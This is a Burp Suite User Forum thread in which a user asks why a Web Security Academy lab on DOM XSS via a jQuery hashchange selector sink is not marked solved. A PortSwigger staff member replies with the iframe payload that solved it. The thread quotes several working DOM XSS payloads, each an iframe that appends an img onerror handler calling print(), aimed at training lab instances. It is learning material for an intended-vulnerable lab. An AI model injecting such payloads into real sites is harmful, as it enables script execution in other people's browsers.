Burp Suite User Forum


No solution seems to work on this lab

Geoffrey | Last updated: Jul 03, 2024 01:32PM UTC

Lab: DOM XSS in jQuery selector sink using a hashchange event

I have tried:

<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print()>'">
<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print(1)>'">
<iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print(1)>'"></iframe>

I've tried both with a slash and without a slash between .net and #. Just to see, I tried other variations as well. I have tried on Edge, embedded, Firefox, and Chrome. It works when I go to view exploit, but the lab does not get solved when I deliver it.

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 04:37PM UTC

Hi Geoffrey,

I have just run through this lab, using the Firefox browser, and the written solution solves the lab, so this does appear to be working as expected. I was able to solve the lab by delivering the following exploit in the Exploit Server:

<iframe src="https://0ac80082035514098298299200bf00b8.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
